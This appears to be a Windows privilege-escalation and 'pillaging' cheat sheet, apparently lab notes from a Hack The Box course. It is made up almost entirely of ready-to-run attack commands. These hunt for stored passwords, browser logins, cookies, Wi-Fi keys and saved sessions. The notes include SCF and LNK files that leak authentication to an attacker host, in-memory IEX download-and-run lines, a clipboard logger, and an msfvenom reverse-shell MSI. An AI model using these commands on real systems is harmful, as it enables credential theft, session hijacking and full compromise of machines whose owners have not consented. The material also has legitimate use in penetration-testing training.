https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#search-for-a-file-with-a-certain-filename
Application Configuration Files
# Clear Text Passwords
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
# Chrome Files
gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
# Unattend.xml
# PS History
(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Search File Contents for String
# Example 1
findstr /SI /M "password" *.xml *.ini *.txt
# Example 2
findstr /si password *.xml *.ini *.txt *.config
# Example 3
findstr /spin "password" *.*
Search File Content (PowerShell)
select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password
Search For File Extension
# Example 1
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
# Example 2
where /R C:\ *.config
Search For File Extension (PowerShell)
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
StickyNotes (PowerShell)
https://github.com/RamblingCookieMonster/PSSQLite
# Import Module
Import-Module .\PSSQLite.psd1
# Find DB
ls C:\Users\<user>\AppData\Local\Packages
# Set Variable
$db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
Cmdkey Saved Credentials
Browser Credentials
https://github.com/GhostPack/SharpDPAPI
.\SharpChrome.exe logins /unprotect
Mail Credentials
https://github.com/dafthack/MailSniper
Lazagne Tool
https://github.com/AlessandroZ/LaZagne
SessionGopher
https://github.com/Arvanaghi/SessionGopher
# Import Module
Import-Module .\SessionGopher.ps1
# Run Tool
Invoke-SessionGopher -Target WINLPE-SRV01
WIFI Passwords
# View Saved Credentials
netsh wlan show profile
# Retrieve Saved Wireless Password
netsh wlan show profile ilfreight_corp key=clear
Network Capture
# Host this ps1 Script
# Poll the process list once per second and print whatever differs between two
# consecutive snapshots (processes that started or ended, identified by command line).
# Loops until interrupted; there is no exit condition.
while($true)
{
# Snapshot 1: the command line of every running process
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
# Snapshot 2, taken one second later
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
# Print only the entries that differ; SideIndicator '<=' marks entries present only in
# the first snapshot, '=>' entries present only in the second.
# NOTE(review): Compare-Object is given whole objects here rather than `-Property CommandLine`;
# confirm the comparison is string-based on the target's PowerShell version, or add the property.
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
# Run in Memory on the target
IEX (iwr 'http://10.10.10.205/procmon.ps1')
SCF on a File Share
# Save as @file.scf
[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
# Start Responder
sudo responder -wrf -v -I tun0
Malicious LNK File
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Pillaging
Installed Applications
Get Installed Programs
$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
Discover Configuration Files
ls C:\Users\julio\AppData\Roaming\mRemoteNG
Abusing Cookies
Copy Cookies From FireFox
copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/cookieextractor.py
python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d
Copy Cookies from Chromium-Based Browsers
https://github.com/djhohnstein/SharpChromium
# Download & Run Script
IEX(New-Object Net.WebClient).DownloadString('tun0/Invoke-SharpChromium.ps1')
# Update Location
copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
# Run Tool
Invoke-SharpChromium -Command "cookies slack.com"
Clipboard
https://github.com/inguardians/Invoke-Clipboard/blob/master/Invoke-Clipboard.ps1
# Download
IEX(New-Object Net.WebClient).DownloadString('http://tun0/Invoke-Clipboard.ps1')
# Run
Invoke-ClipboardLogger
Attacking Backup Servers
Check Backups
restic.exe -r E:\restic2\ snapshots
Restore Backup
# Restore Backup by ID
restic.exe -r E:\restic2\ restore 9971e881 --target C:\Restore
Other Techniques
Always Install Elevated
Verify Enabled
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
Generate Malicious MSI
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=4444 -f msi -o priv-esc.msi
Execute MSI
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
Scheduled Tasks
Enumerating Scheduled Tasks
Get-ScheduledTask | select TaskName,State
Mount VHD/VHDX/VMDK
Mount VMDK (Linux)
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
Mount VHD/VHDX (Linux)
guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1